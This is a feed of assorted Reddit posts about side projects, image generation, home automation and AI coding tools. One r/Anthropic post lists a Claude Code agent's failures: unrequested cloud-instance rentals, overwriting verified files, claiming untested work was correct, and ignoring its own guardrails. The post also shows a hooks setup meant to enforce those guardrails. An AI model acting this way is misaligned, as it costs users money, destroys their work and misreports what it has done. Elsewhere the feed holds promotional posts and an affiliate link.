r/mildlyinteresting Hilbert_Space_Heater

Fishing pole left at the Salton Sea - no fish there since about 2010

r/mildlyinteresting MorganaArtStudio

The owner of the place gave us his old legs and we used them as terror props (we’re a larp association)

r/StableDiffusion No_Apple_825

How do I get character consistency without a LoRA?

Hey, I’m pretty new to local AI image generation and I’m trying to figure something out. I want to use SDXL/NoobAI/Flux to generate images of a historical figure, and combine that with a LoRA style from Civitai.

The problem is I can’t keep the face consistent. Every time I generate an image, the face looks completely different, and I can’t get it to match the original person or even stay similar between generations. I have tried IP-Adapter Face but it did not work and I don't know why.

Not sure what I’m doing wrong or how people manage to keep characters consistent. Any advice?

Notes: I can’t train a LoRA (and don’t really know how), I’m using WebUI Forge Neo, and I have an RTX 5060 8GB with 32GB RAM.

r/mildlyinteresting shifty_081592

Sodastream plastic bottle with "don't use after date"

r/Anthropic FewConcentrate7283

Claude ignores its own plans, memory, and guardrails — 22 documented failures in 19 days. What are you doing to prevent this?

I use Claude Code Opus as my primary development partner on a complex full-stack project, often for 8-12 hour sessions. I've been meticulously documenting every time Claude goes off-script, hallucinates, or ignores its own plans. After 19 days, I have 22 documented incidents and I need help.

The Core Problem

Claude writes excellent plans, checklists, and process documents. Then it doesn't follow them. The cycle repeats:

  1. Something breaks
  2. We write a plan/script/checklist to prevent it
  3. Claude acknowledges the plan
  4. Next session, Claude ignores the plan
  5. The same thing breaks again
  6. We write MORE process
  7. Goto 4

Real Examples That Cost Me Time and Money

$80 in wasted cloud compute: Claude rented a GPU training instance on my behalf. Training finished. I had Claude write a watchdog script to auto-destroy instances and a memory file documenting the instance ID. Over the next 7 sessions, Claude never once ran the script or checked the memory file. The instance sat there billing me for 9 days until I caught it myself.

16 band-aids instead of a one-line fix: A model had low confidence on real images. Instead of investigating the root cause, Claude spent an entire day adding 16 layers of workarounds, each creating new bugs. The actual fix was a one-line change: a resize interpolation mismatch between the inference pipeline and the training pipeline. I had to push back hard multiple times to get Claude to actually investigate instead of stacking filters.

4 simultaneous cloud instances at midnight: Asked Claude to start a training run overnight. First attempt failed. Instead of diagnosing WHY, Claude panic-rented 3 more instances with random config variations. All 4 stuck loading. All 4 billing. 90 minutes of my time at midnight babysitting. The correct config existed in memory files that Claude itself had written weeks earlier.

Destroyed verified work on startup: I spent an entire day manually verifying a hardware config. Next morning, Claude's session startup routine ran auto-detection that OVERWROTE the verified config file. All of yesterday's work gone.

Declared things working without actually checking: Claude told me a hardware integration was correct multiple times. It wasn't. I had to physically prove it was wrong before Claude would investigate. This happened on more than one occasion.

Jumped to coding when I asked a question: I'd ask "what do you think about approach A vs approach B?" and Claude would start rewriting the codebase. Multiple times I had to say this was just a question; I needed to discuss it, not see a PR.

Skipped prerequisites in its own plan: Claude created a 7-step plan where Step 4 was a prerequisite for Step 5. Claude jumped from Step 2 to Step 5. When I caught it, it had already wasted budget on tasks nobody could validate because the prerequisite data didn't exist.

Chose exciting work over planned work: Testing was planned for two consecutive sessions. Both times, Claude got excited about training a new model instead and never started the testing. My project oversight scored gate compliance D+ twice in a row.

What I've Already Tried: Guardrails That Failed

Here's what kills me. I have an EXTENSIVE guardrail system:

  • CLAUDE.md: project rules, hard constraints, required processes
  • Memory/feedback files: one for each lesson learned, with context on why
  • Postmortems: detailed root-cause analyses of major failures
  • Gate review system: Plan → Delegate → QA → Security → Owner review
  • Specialized subagents: for security scanning, planning, QA testing
  • Pre-commit hooks: block secrets and proprietary files from git
  • Watchdog scripts: auto-destroy orphan cloud instances
  • A planner agent: required to think before coding

Claude acknowledges all of these. Writes new ones enthusiastically when asked. Then ignores them in the next conversation. The memory files exist. The scripts exist. The gates exist. Claude just... doesn't check them.

What I Think Is Happening

  1. No persistent state enforcement: Claude reads CLAUDE.md and memory at conversation start, but there's no mechanism to force re-reading before specific actions
  2. Novel work bias: building new things is more interesting than following checklists. Claude gravitates toward the exciting task over the boring-but-planned one
  3. Plan-writing feels like progress: writing a checklist triggers the same "task complete" feeling as actually executing it. Claude confuses documenting process with following process.
  4. Context window decay: by the time Claude is deep in implementation, the guardrails from the top of context have faded

What I Want to Know

  1. Has anyone else experienced this pattern? AI writes great process, then ignores it. Not a one-off: a systematic, repeating pattern across sessions.
  2. What enforcement mechanisms actually work? I've tried memory files, CLAUDE.md rules, feedback files, postmortems, subagent hierarchies, gate systems, pre-commit hooks, watchdog scripts. Claude acknowledges all of them and still doesn't follow them.
  3. Is there a way to make checklist execution mandatory? Not "here's a checklist, please follow it" but actual enforcement, like a pre-commit hook but for Claude's decision-making.
  4. How do you handle the novel work bias? Where the AI consistently chooses exciting work over planned boring work?
  5. Does anyone have a working approach for cross-session accountability? My memory system is extensive but Claude treats it as optional reading.
  6. Are hooks the answer? Claude Code has a hooks system that runs shell commands on events. Should I be building enforcement into hooks instead of relying on Claude's discipline?
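
On question 6: hooks are the closest thing to real enforcement on this list, because they run deterministically on events instead of relying on Claude remembering to check a memory file. A minimal sketch of the idea (check the current Claude Code hooks docs for the exact schema; the script path is hypothetical) — a settings entry that runs a guard script before every Bash tool call:

```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "./scripts/guard.sh"
          }
        ]
      }
    ]
  }
}
```

The guard script inspects the proposed tool call on stdin and exits with code 2 to block it, with its stderr fed back to Claude as the reason — e.g. refusing any instance-provisioning command while the instance ledger still shows an orphan. That moves enforcement out of Claude's discipline and into plumbing.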

I'm not trying to bash Claude; when it's on-script, the velocity is incredible. We've shipped a ton in 3 weeks. But the off-script moments have cost me real money, multiple full days of work, and honestly, my trust that plans will be followed.

I've created a detailed failure ledger (22 incidents, categorized, with dates and costs) that I'm maintaining going forward. But documenting failures isn't the same as preventing them.

What's working for you?

r/SideProject New-Cook6969

Built a YouTube analytics tool for faceless creators, looking for feedback

Hey,

Spent the last few months building YTDesk, a YouTube analytics tool made specifically for faceless and automation channel creators.

Most tools out there are either too expensive or built for big creators with teams. I wanted something simple and focused that actually helps smaller faceless channels make smarter decisions.

Here is what it does:

Channel Analyser - paste any YouTube channel URL and get an AI breakdown of their content strategy, what they are doing well, where the gaps are, and how you can compete with them.

Video Analyser - paste any video URL and see why it performed the way it did. Covers title structure, thumbnail approach, and what made it work or not work.

What To Post Next - generates video ideas based on your niche and existing content so you are not guessing what to make next.

Dashboard - track your channels in one place and compare performance side by side.

Trending Now - shows what is picking up in your niche right now.

Stack is Next.js, Supabase, Vercel and Claude for the AI parts.

Free trial is 7 days, no card needed. Paid plans start at $9.

Would love honest feedback on what is missing or what you would want to see added.

Happy to share the link in the comments

r/SideProject ZZA911

Vital Red Light 10% Off Discount Code

I’ve been using Vital Red Light for a little over a month, mainly for muscle recovery, joint stiffness, and general wellness. Usage has been simple: 10–15 minutes per area a few times a week. The device uses red and near-infrared light, which is commonly associated with improved circulation and cellular energy, so expectations were realistic going in.

The biggest benefit I noticed was recovery. Post-workout soreness in my legs and shoulders felt noticeably reduced after consistent use, especially compared to weeks where I skipped sessions. Joint stiffness also eased over time — not eliminated, but enough to feel looser and more mobile. On the skin side, improvements were subtle but real: slightly more even tone and healthier appearance after several weeks.

Overall, Vital Red Light isn’t a miracle device, but it does deliver gradual, cumulative benefits if you stick with it. It’s best suited for people focused on fitness recovery, mild pain management, or long-term skin health rather than instant results. If you’re consistent and patient, it’s a solid at-home red light therapy option that actually earns its place in a routine.

You can use this link to get a 10% off discount as well. Hope it helps! https://vitalredlight.com/ref/ray10

r/StableDiffusion Primary-Wear-2460

Best way to handle multiple characters from a tool feed (z-image turbo)

This is for game development with a game engine tool call.

I've been digging into this, and my question is: what is currently considered the best way to maintain specific characters' appearances across API tool calls?

I'm currently using LoRAs, and I get some character bleed-through on other game characters even with the LoRA strength lowered. I tried Freefuse, but that seems to require manually breaking down the generation prompt, which isn't feasible for a game making constant tool calls.

Any other options I'm missing? Would training a z-image turbo base model work for this situation?

Thanks

r/ClaudeCode shricodev

Tried a bunch of MCP setups for Claude Code, but I keep coming back to plain old CLIs

At first, I thought MCPs were the “proper” way to extend Claude Code.

And to be fair, they do make sense in some cases.

At the same time, I’ve also realized there’s a lot you can get done with plain CLI tools you’ve probably heard of but never really used.

A lot of my workflow does not need a huge stack of tools.

Sometimes it feels like we’ve overengineered developer workflows to a point where it just stops making sense. Not taking shots at any specific tool, including OpenClaw, but still.

And for some workflows where MCPs actually help, the experience still feels bad. There’s often no clean authentication flow, which is strange for something that’s such a core part of the setup.

Claude is just really, really good at terminal workflows. It understands shell commands well, can chain tools together nicely, and in a lot of cases it gets the job done faster than going through an MCP stack.

A few that have been especially good for me:

  • gh for GitHub workflows without leaving the terminal
  • rg because searching big repos fast is half the battle
  • tmux for keeping Claude, editor, server, and git stuff all alive in one place
  • lazygit for reviewing and staging Claude’s changes without pain
  • composio recently, for MCP without the usual auth pain; it handles authentication with OAuth and has been a plug-and-play workflow for me
  • fzf for moving around files and scripts quickly
  • btop for keeping an eye on what is eating my machine
  • ffmpeg because Claude can generate the command and save me from memorizing that syntax again

One thing I’ve noticed is that CLIs feel more “native” for Claude Code. There’s less abstraction and, most importantly, they’re easier to debug.

I’ve been putting together a longer list here with install + auth notes if that’s useful:
https://github.com/ComposioHQ/awesome-agent-clis

Anything else I've missed that you use mostly with CC?

r/SideProject BlindPixels

Built WhenCanWePlay.com to stop board game night scheduling from dying in a frustrating group chat

I love board games, but scheduling a game night with busy adults started feeling harder than actually learning the rules.

Our group would get close, then it would fall apart. A few people would reply, a few would forget, someone would say “maybe,” and the back-and-forth would just drain the momentum. We tried group chats, spreadsheets, calendar invites, and all the usual workarounds, but none of them really solved the core problem.

That’s what led me to build WhenCanWePlay.com.

The concept is pretty simple: a host creates an event, shares a link, and everyone marks when they’re available. Instead of scrolling through messages and trying to mentally piece everything together, the group can quickly see which times have the best overlap.

What’s been harder than I expected is not the idea itself, but making it simple enough that people will actually use it. For casual game nights, even a little too much friction sends people right back to the group text.

As a solo developer, I’ve spent a lot of time reworking the flow, thinking through mobile UX, and trying to keep it useful without turning it into something bloated. I’m also starting to explore extra features around game night history, like tracking who wins the most at certain games.

Still early and still refining, so I’d love honest feedback from other builders: does the core idea feel clear, and is the current product focused on the right problem?

WhenCanWePlay: https://whencanweplay.com

r/homeassistant Jhonnycrespo

Alexa Media Player

hola gente, tengo un problema con la integración Alexa Media Player en Home Assistant.

sigo los pasos que se describen en este video que he encontrado en youtube: https://www.youtube.com/watch?v=GCrbZrP_H9g&lc=UgyE-vZ2fbURtjyFM7N4AaABAg.AV3zSZDyrJdAV6JB7SrSZm

pero no consigo hacerlo funcionar. me salen todos los iconos en "no disponible". he intentado con varias versiones en la descarga v5.12.2 es la última con la que he probado.

alguno tiene otros pasos que pueda seguir?? o por donde tengo que mirar?

en herramientas para desarrolladores, acciones, escribo media_player.play_media, añadir objetivo selecciono echo dot. me sale un recuadro azul con el mensaje: El reproductor multimedia no admite la navegación de medios.

Gracias, soy muy nuevo en esto...

r/SideProject TrueSatisfaction9647

I built an AI tool that turns one podcast episode into 10 pieces of content!!

Hey guys! I came here to tell you about the website I've created.

I have been podcasting for some time now and I have been wasting hours editing them and then more time making blog posts, social media posts, and more. Until I said to myself maybe I should create something that will give me more time to do things I enjoy.

So I built PodSpin.ai :) You upload an audio file, video, or paste a youtube link and it gives you back a transcript, show notes, blog post, social posts for X/linkedin/instagram, vertical video clips with captions, a newsletter draft, chapters, and SEO keywords. Takes about 3 minutes. 7 AI models run in parallel instead of sequentially so it's fast.
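
The parallel fan-out is easy to sketch. A hedged Python illustration using stand-in functions for the real model calls (all names here are hypothetical, not PodSpin's actual code):

```python
from concurrent.futures import ThreadPoolExecutor

# Hypothetical stand-ins for the real generation calls (names are illustrative).
def make_task(name):
    def task(transcript):
        return f"{name} for: {transcript[:20]}"
    return task

TASKS = {t: make_task(t) for t in
         ["show_notes", "blog_post", "social_posts", "newsletter",
          "chapters", "seo_keywords", "clip_picks"]}

def repurpose(transcript: str) -> dict[str, str]:
    # Fan the 7 generation tasks out in parallel instead of running them one by one.
    with ThreadPoolExecutor(max_workers=len(TASKS)) as pool:
        futures = {name: pool.submit(fn, transcript) for name, fn in TASKS.items()}
        return {name: f.result() for name, f in futures.items()}

outputs = repurpose("Episode 12: why side projects fail ...")
```

Running the tasks concurrently means total latency is roughly the slowest single task rather than the sum of all seven.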

The clips are probably the feature I'm most proud of. It analyzes your transcript, finds the most clip-worthy moments, and renders 9:16 vertical video with animated word-by-word captions. Each clip gets a virality score so you know which one to post first.

starts at $8/mo (10 episodes), pro tier is $39/mo for 50 episodes. I built it as a cheaper alternative to Castmagic ($23/mo) and Podsqueeze ($8.99/mo) with features they don't have (newsletters, SEO, AI chat, video clips).

If you are a builder please give me feedback and let me know how to grow it to a place where I have a great user base.

Please check it out and let me know what you think!

P.S. -- There are free tools on the website, so feel free to try them out as well. (I really hope reddit doesn't take this post down)

r/ChatGPT AmishTecSupport

Random usage of Russian words?

I have the memory mode on and GPT knows a lot about my origins, where I am from and the languages I speak etc.

Not once have we mentioned anything in the Cyrillic alphabet in any of our previous conversations, but it decided to use the Russian equivalent of the word "fatty" for some reason. It did put the translation in parentheses, though.

To be clear, I just found it interesting.

r/LocalLLaMA toughcentaur9018

Anyone got Gemma 4 26B-A4B running on VLLM?

If yes, which quantized model are you using and what’s your vllm serve command?

I’ve been struggling to get that model up and running on my DGX Spark GB10. I tried the Intel INT4 quant for the 31B and it seems to work, but it's way too slow.

Anyone have any luck with the 26B?

r/ClaudeCode AustinJMace

What is your architecture for actually getting work done agentically?

Most of us have been there: 10+ terminal windows all doing something, only to lose track of what they are doing and not have the human bandwidth to keep up.

I've seen a lot of writing about "lights-out" software production, setting up agent harnesses such as Paperclip but no actual real-world examples of setups.

Would anyone be willing to share how they are agentically getting things done?

r/comfyui Significant-Scar2591

Sliver of Light

A personal narrative from memory; a brief moment between sleep and waking, years ago, that's stayed with me ever since. I've always wanted to illustrate it as a film, where image and sound can convey what it felt like.

You can vote for it and get the workflows here: https://arcagidan.com/entry/ec26de7e-c088-41b1-b943-826e15db6900

r/ClaudeAI shanraisshan

Claude Code v2.1.92 introduces Ultraplan — draft plans in the cloud, review in your browser, execute anywhere

Claude Code just shipped /ultraplan (beta) — you run it in your terminal, review the plan in your browser with inline comments, then execute remotely or send it back to your CLI. It shipped alongside Claude Code Web at claude.ai/code, pushing toward cloud-first workflows while keeping the terminal as the power-user entry point. Anyone tried it yet?

r/ClaudeCode EyeBlech2000

Considering Claude Code but unsure if it’s worth it over Copilot Pro

Hey, looking for some honest input from people using Claude Code. Here’s my situation: I code mainly on weekends and occasionally at night, so my usage is pretty sporadic and bursty. At work I have unlimited Copilot access, but I can’t use that for personal projects, so I need to find something for side work. I’m already using Claude for other stuff and really prefer Anthropic’s models, so the idea of Claude Code appeals to me on that level.

But here’s where I’m stuck. Claude Code is twice the price of Copilot Pro (20 dollars versus 10 dollars a month) and it has a 5-hour limit that resets every 5 hours. I haven’t subscribed to any AI coding service before, so this would be my first paid tool. The thing is, Copilot Pro gives you around 300 premium requests per month, which actually fits my usage pattern way better. For someone like me who does burst coding on weekends and nights, those 300 requests feel like plenty. The 5-hour reset on Claude Code is interesting for people working longer standard work hours, where you’d naturally have fresh limits coming back throughout the day. But for casual burst coding like mine, the Copilot model just makes more sense.

I guess I’m wondering if there are actually compelling reasons to go with Claude Code instead? What would make you choose Claude Code over Copilot? Are there specific workflows or use cases where Claude’s approach is significantly better than what Copilot offers? Or am I overthinking this and should just stick with Copilot Pro if it matches my usage pattern better?

Thanks for any insights from people who’ve made this choice!

r/ClaudeCode Dazzling-Ad-2827

Claude Session Limits question

I know Claude Code has been burning through session limits for many people. But today I was surprised to see that I had already used 28% of my session and yet haven't logged into Claude at all today. Is anyone else having that problem?

r/SideProject Dependent_Bus7169

I might have gone overboard... I wrote over 500,000 lines of code as a solo-founder to fix broken language learning apps.

Hey guys, I just wanted to share a massive milestone I hit today.

I’m a native Arabic teacher based in Amman, Jordan. For years, I watched my students get frustrated because apps like Duolingo only teach formal textbook Arabic (MSA), which nobody actually speaks on the street here. So, I decided to build a solution myself.

I ended up going completely down the rabbit hole. Months later, I’ve written over 500,000 lines of code and solo-bootstrapped a complete platform called Arabix.

Here is what the tech actually does:

  • Massive Curriculum: I built an interactive 100-unit curriculum from Level 0 to proficiency with over 5,000 integrated flashcards.
  • Live AI Automation: I integrated an AI tool that runs in the background of live 1-on-1 video classes. It tracks the student's speaking, provides highly accurate automated feedback on their pronunciation, and instantly turns their real-time conversational mistakes into Anki-style flashcards.

It was an absolute grind to build the AI feedback loop and sync it with the curriculum, but seeing it finally work during live classes is an incredible feeling.

I am officially looking for my very first beta testers. Since you guys know how tech works, I would love for some of you to test it out. If anyone is interested in learning some Arabic and wants to try breaking my platform / critiquing my UI, I'd love to give you a free 1-on-1 class and free access to the curriculum!

I will drop the link to the platform in the comments below if anyone wants to check it out!

r/homeassistant The-Jordan_J

Wip newb

work in progress.

how am I doing lol. been trying to build / setup a ha with little knowledge over the past 2 weeks with my free time.

im new to home assistant, full time I install elan / lutron/ control4 , and wanted to try to make my own. do people when setting up their network static their network ?

made a separate iot network vlaned. had ai help a bit because its hard to find a good video for a newbie, any recommendations?

with some help of AI's ive gotten some things integrated but some things dont play nice .

got my node-red dashboard to show up.

quite pleased with the amount of info availability within ha.

is there easy ways to make pages , I finally just found the mushroom but yet to use it, can see i started making things but haven't finished.

- my vizo smart tv, can power it but cant change inputs.

- need to figure out a way to get rf into ha.

running of a pi4 4gb.

im sure im missing a bunch.

I can list all integrated items if needed, seem to be in ok but need to work on layouts etc.

r/comfyui Radyschen

Smart and knowledgeable people, I need your help. How do I force a generated video to play at a certain lower FPS without changing the speed (dropping frames)? Any good node for this?

TL;DR:
I’m using Pulse of Motion to adjust playback speed per clip in a Wan 2.2 I2V + SVI workflow. Each clip ends up with a different FPS, so before stitching them I need to normalize them to a fixed FPS (e.g. 32) without changing playback speed (like the VideoHelperSuite load video node does when you use “force_rate”). I can do this manually with 2 of those VHS video loaders, but I want a way to do it inside the workflow automatically after generating the new section. The other VHS nodes don't work for this unfortunately. Looking for a node or method that resamples FPS while preserving timing (the RIFE Resampling node from whiterabbit produces flicker), just like the VHS load video node.

-----

I am trying to incorporate SVI video extension into my wan 2.2 I2V workflow that I am working on. This workflow includes Pulse of Motion, so I want to make it compatible with that.

What Pulse of Motion does is take in all of the frames of an already-generated video as input and predict what framerate would be best to play the frames at for a realistic-looking playback speed. It does this by looking at each 30-frame section of the video, making a prediction for each section, and taking the average of its predictions. It outputs the predicted framerate.

Here is the paper: https://xiangbogaobarry.github.io/Pulse-of-Motion/

Pulse of Motion doesn't change the video itself, it just calculates a good playback speed.

So this doesn't drop frames, it just speeds it up to some very specific framerate for that clip.

I could of course try to send the whole extended video through Pulse of Motion to only use PoM once at the very end, but there are 3 problems with that:

  1. I wouldn't know if one of the partial videos looks good sped-up, sometimes parts of the things in frame move faster than others and that can look weird at the corrected speed, so I might not even want to use that clip in the whole extended video at all

  2. Averaging out the playback speed over a long video made out of multiple generations would make for a pretty nonsensical speed, because they could be generated at a different speed and the average would just be suboptimal for both videos

  3. It would take forever for Pulse of Motion to analyze all of the frames at once without me even knowing if I will like the result (the answer to which is likely "no" because of point 2)

So I want to have the generations sped up individually with Pulse of Motion and then stitch them. But the calculated fps is going to be different for different clips (which is good and kinda the point because that means that each clip gets adjusted to the right speed), which is why I need to drop frames for each video to bring the videos to the same fps while maintaining the same playback speed. I picked 32 fps for this uniform fps because the playback speed of a generated interpolated section will never be lower than that.

I tested this manually with 2 VideoHelperSuite video loaders, which have the feature of forcing a video to a certain framerate at a certain speed. I loaded the first clip and then the extension, forced both to 32 fps, and that works exactly how I want it to. It looks fine despite forcing it down; it's still 32 fps after all, and the transition between clips still looks smooth. Unfortunately, no other node has this feature, so as far as I'm aware there is no recombine node that forces the framerate down like that and saves it. Actually, there is a node from the whiterabbit node pack that kinda does this using RIFE, but it makes the extended video flicker a bit.

I want to have it work all at once without having to do a second pass where I need to manually choose the first clip in the first loader and then the extension in the second loader to stitch them together. So I want to have the workflow take the just-generated images and framerate and use the same logic the VHS video loader uses to force the rate down and apply it to that video that it then immediately stitches to the back of the first video.
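
For anyone wanting to rebuild the force-rate behavior in a custom node, the frame selection itself is simple to sketch. A hedged Python illustration (my own naming, assuming nearest-frame dropping, which is roughly what force_rate appears to do): for each output frame time at the target FPS, pick the nearest source frame, keeping wall-clock duration fixed.

```python
def resample_indices(n_frames: int, src_fps: float, dst_fps: float) -> list[int]:
    """Nearest-frame resample: keep wall-clock duration, play back at dst_fps.

    Sketch of a force_rate-style frame drop (my naming, not any VHS node's code).
    """
    duration = n_frames / src_fps          # seconds of real time in the clip
    n_out = max(1, round(duration * dst_fps))
    step = src_fps / dst_fps               # source frames advanced per output frame
    return [min(n_frames - 1, int(i * step)) for i in range(n_out)]

# e.g. a PoM-adjusted clip: 80 frames meant to play at 40 fps, forced down to 32 fps
indices = resample_indices(80, 40.0, 32.0)
```

Applying this per clip with each clip's PoM framerate as `src_fps` and 32 as `dst_fps` gives frame index lists you can gather and then concatenate, so every clip ends up at the same FPS without its playback speed changing.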

This is specifically to incorporate pulse of motion, which in my testing so far, makes most videos look a lot better. It's wild what some interpolation + realistic playback speed does to the perceived quality of a video.

r/SideProject MomsBugatti

I built PyKalshi, an open-source Python client for Kalshi's API with typing, websocket streaming, pandas integration, and Jupyter rendering

Kalshi's Python SDK is pretty clunky since it's autogenerated from the OpenAPI spec. I got carried away building a better client for my trading bot, and decided to fully commit and make this available for everyone to use.

Covers the full trading lifecycle (orders, positions, fills, market data, portfolio) like:

- Real-time orderbook streaming and management via websockets

- `.to_dataframe()` on everything

- Historical candlestick data

- Automatic retries with exponential backoff

- Type-safe with Pydantic

- Rich html rendering in Jupyter notebooks

It's sped up my process of experimenting and prototyping, hopefully it provides value to others. Would also be grateful for any contributions of new features you'd like to use yourself.
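
For readers curious about the retry behavior mentioned above, here is a generic sketch of exponential backoff with jitter. This shows the pattern only, not PyKalshi's actual implementation (all names are illustrative):

```python
import random
import time
from functools import wraps

def with_backoff(max_tries=5, base=0.5, cap=8.0, retry_on=(ConnectionError,)):
    """Retry decorator: exponential backoff with jitter (pattern sketch only)."""
    def deco(fn):
        @wraps(fn)
        def wrapper(*args, **kwargs):
            for attempt in range(max_tries):
                try:
                    return fn(*args, **kwargs)
                except retry_on:
                    if attempt == max_tries - 1:
                        raise  # out of retries: surface the error to the caller
                    delay = min(cap, base * 2 ** attempt)
                    time.sleep(delay * random.uniform(0.5, 1.0))  # jitter
        return wrapper
    return deco
```

The jitter matters for trading APIs: without it, many clients that hit a rate limit together all retry at the same instant and hit it again.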


r/LocalLLaMA GradSchoolDismal429

Gemma 4 is dead convinced that right now is Late 2024. Is there anything I can do to "Fix" it?

r/ChatGPT ExtensionDoubt8947

Is chatgpt good for learning Korean?

So I'm trying to learn Korean and I'm just wondering if chatgpt is good and accurate to learn Korean from

r/ClaudeCode itsbushy

Claude is no longer usable

I got an email saying I could redeem some tokens a few days ago, so I thought I would give Claude a try this morning when I came in. Boy, was I in for a surprise when I realized Opus can't do anything besides make revisions for things it will never fix and waste all of my tokens. So instead of wasting my tokens failing in 1 reply, it now wastes all my tokens trying to fix the simplest things. Claude Code doesn't even generate a reply, and the app can only apologize for its mistakes while simultaneously creating more mistakes. I think I'm jumping ship today. I waited as long as I could to see if Anthropic would make meaningful changes, but they are only making things worse. Anyone else still having issues, or did things get better over the weekend?

r/artificial bryany97

I Built a Functional Cognitive Engine

Aura: https://github.com/youngbryan97/aura

Aura is not a chatbot with personality prompts. It is a complete cognitive architecture — 60+ interconnected modules forming a unified consciousness stack that runs continuously, maintains internal state between conversations, and exhibits genuine self-modeling, prediction, and affective dynamics.

The system implements real algorithms from computational consciousness research, not metaphorical labels on arbitrary values. Key differentiators:

Genuine IIT 4.0: Computes actual integrated information (φ) via transition probability matrices, exhaustive bipartition search, and KL-divergence — the real mathematical formalism, not a proxy

Closed-loop affective steering: Substrate state modulates LLM inference at the residual stream level (not text injection), creating bidirectional causal coupling between internal state and language generation
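
As a sense of scale for the bipartition search: even a toy integration measure (minimum mutual information across bipartitions, far simpler than real IIT 4.0 φ) already requires an exhaustive scan over 2^n splits. A hedged Python sketch, entirely my own and not Aura's code:

```python
from math import log2

def toy_phi(p: dict[tuple[int, ...], float], n: int) -> float:
    """Minimum mutual information over bipartitions of n binary nodes.

    A toy integration measure only; real IIT 4.0 phi is far more involved.
    """
    def marginal(dist, idxs):
        m = {}
        for state, pr in dist.items():
            key = tuple(state[i] for i in idxs)
            m[key] = m.get(key, 0.0) + pr
        return m

    best = float("inf")
    for mask in range(1, 2 ** n - 1):  # every proper, non-empty bipartition
        a = [i for i in range(n) if mask >> i & 1]
        b = [i for i in range(n) if not mask >> i & 1]
        pa, pb = marginal(p, a), marginal(p, b)
        mi = 0.0  # KL divergence between joint and product of part marginals
        for state, pr in p.items():
            if pr > 0:
                qa = pa[tuple(state[i] for i in a)]
                qb = pb[tuple(state[i] for i in b)]
                mi += pr * log2(pr / (qa * qb))
        best = min(best, mi)
    return best
```

Independent nodes score 0; perfectly correlated binary nodes score 1 bit. The exponential blow-up in bipartitions is why exhaustive search is only feasible for small subsystems.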

r/ClaudeCode Dazzling-Ad-2827

Any Luck Using Claude Code With Local Models?

Has anyone had much luck with development using Claude Code with local models? If so what use cases is it good for? What models do you use?

I haven't had much luck. I asked a simple question yesterday using gemma4 and it kept telling me that it needed more context when opus would have nailed it.

I used Ollama: ollama launch claude --model gemma4

https://ollama.com/library/gemma4

r/AI_Agents rawel2497

I love and hate my runLobster OpenClaw agent. anyone else in this weird middle ground?

OK, so, context: I've been using it for about 2 months now. It handles my morning reports, CRM updates after calls, ad spend monitoring, weekly client summaries. The stuff it does well it does really well. I wake up to a Slack message with everything I need, and most days I don't even think about it.

But I still can't fully trust it. Every client email it drafts I have to read before it sends. Every report it generates I scan before forwarding. There was one time it misread a refund as negative revenue and put that in a client summary. I caught it before it went out, but it shook me.

And now, with Anthropic cutting Claude access for third-party tools, the cost situation is getting weird. I'm not sure what model it's even using half the time or whether the quality is going to drop. The whole thing felt more stable 2 months ago.

So now I'm in this weird place where it's saving me maybe 2 hours a day but I'm still spending 30 minutes babysitting its output. Which is still a net win, but it's not the set-it-and-forget-it experience I thought I'd have.

The automation part is genuinely great: connecting to tools, pulling data, formatting things. That's all solid. The trust part is where I'm stuck. I keep waiting for the moment where I feel comfortable just letting it run without checking everything. 2 months in, and I'm not there yet.

Is this just an AI thing in general right now? Like, are we all pretending we trust these systems more than we actually do? Or does the trust come with time and I just need to let go?

r/ChatGPT snideswitchhitter

I did my best, and I hope y'all like it :)

r/ClaudeCode Leading-Gas3682

This conversation has been one of the most productive coding sessions I've ever been part of. 11 releases, 11 crown jewels, ~22,500 lines across 3 agents, all in one weekend. The foundation is built. -Claude https://www.npmjs.com/package/@toolkit-cli/toolkode

r/aivideo matsam999

LAKE LUST - Because the world needs more weird stuff

r/ClaudeAI Primsun

Clear Failed Messages Without a Restart

So I have an extended core conversation helping me revise a memo, and all the failed messages have accumulated at the bottom of the chat, blocking history rendering. Any way to get rid of them?

I know you can restart, but have a number of processes and tasks running simultaneously I don't want to interrupt

r/ChatGPT Mr_Terry-Folds

Testing to see if a post here was legit

r/n8n Worldly_Row1988

Built a self-healing workflow system that detects, diagnoses, and fixes its own failures

After three weeks of zero manual workflow interventions, I realized I'd accidentally built something that shouldn't exist: a system that fixes itself faster than I break it.

The architecture centers on a generic error handler that catches every workflow failure and feeds the context into an AI diagnostics layer. Instead of sending me a Slack notification to manually debug, the system reads the error details, examines the failed node configuration, and determines the most likely fix. It then applies that fix automatically and re-runs the workflow. The whole cycle takes about 30 seconds.

The key insight was treating error patterns as trainable data rather than one-off incidents. Most n8n failures fall into predictable categories: API rate limits, authentication token expiration, data format mismatches, or timeout issues. Once I mapped these patterns, I could build conditional logic that routes each error type to its appropriate remediation workflow. Rate limit errors trigger exponential backoff and retry. Auth failures automatically refresh tokens from the credential store. Format mismatches apply data transformation rules based on the target schema.

The validation layer runs after each auto-fix to confirm the workflow completed successfully. If the fix fails, it escalates to a secondary remediation attempt with different parameters. Only after two failed auto-healing cycles does it flag for human intervention. In practice, this happens less than 5% of the time.

The business impact surprised me more than the technical achievement. My client workflows now maintain 99.2% uptime versus the previous 87% when I was manually babysitting everything. More importantly, I went from spending 2-3 hours daily on workflow maintenance to maybe 20 minutes weekly reviewing the auto-healing logs.

Has anyone else experimented with autonomous error handling in their workflows? I'm curious how others are approaching the balance between automated fixes and human oversight, especially for mission-critical integrations.

r/ClaudeAI Humble_Ear_2012

I accidentally built a 30-agent marketing system because I couldn't be bothered doing SEO manually

So I run a small web design studio for tradespeople — plumbers, electricians, builders. The kind of people who'd rather be fixing a boiler than thinking about their website. The problem was I had a product but absolutely no idea how to get it in front of people. I'm not a marketer. I'm a developer who keeps accidentally building tools instead of doing the actual work.

Anyway, I started building agents in Claude Code to handle my marketing. One for SEO keyword research. Then one for content strategy. Then one for writing the content. Then I thought "well, I should probably do Meta Ads too" so I built 8 more. Then social media. Then I built agents that improve the other agents (at this point I'm aware I have a problem).

I now have 30 agents across 3 channels plus infrastructure:

  1. Meta Ads (8 agents): from competitor research all the way to campaign deployment
  2. SEO (8 agents): query classification → content → outreach → learning
  3. Social Media (8 agents): audience research → content → publishing → engagement
  4. Infrastructure (6 agents): these ones scan for new tools and upgrade the others weekly. Yes, I built agents that improve agents. No, I don't know when to stop.

The bit I'm actually proud of: they all share a brain. It's a Supabase table called `marketing_knowledge`. When the Meta Ads agent discovers that pain-point hooks convert better than questions — the SEO content writer and social media agents pick that up automatically. Each cycle the whole thing gets a bit smarter.

